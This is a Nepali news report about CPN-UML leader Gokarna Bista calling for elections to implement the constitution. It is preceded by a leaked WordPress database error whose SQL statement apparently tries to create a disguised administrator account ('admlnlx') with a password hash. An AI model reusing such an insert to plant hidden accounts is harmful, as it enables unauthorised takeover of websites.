WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuTLe4o../i.TOg5rkXXssALm4qPXV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:43:27', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ १९ –
नेकपा (एमाले)का नेता गोकर्ण विष्टले संविधान कार्यान्वयनका लागि निर्वाचनको विकल्प नभएको बताउनुभएको छ ।एमाले बाँकेद्वारा आज कोहलपुरमा आयोजित कार्यकर्ता भेलामा उहाँले भन्नुभयो, “लोकतन्त्रमा आफ्नो माग राख्न पाउनु एउटा पक्ष हो, तर त्यसको निहुँमा जनताको अधिकारमाथि बन्देज लगाउन पाइँदैन ।”
नेता विष्टले निर्वाचन जनताको लोकतान्त्रिक अधिकार भएकाले यसलाई कसैले रोक्छ भने त्यो कदापि स्वीकार्य नहुने बताउँदै जनताको सर्वोच्चतालाई चुनौती दिनेलाई पाखा लगाउनुपर्छ भन्नुभयो ।
‘आफ्नो दल निर्वाचनको पक्षमा छ, सरकारले निर्वाचनको मिति तत्काल घोषणा गरी संविधान कार्यान्वयनको बाटो सहज बनाउनुपर्छ उहाँले भन्नुभयो ।’ रासस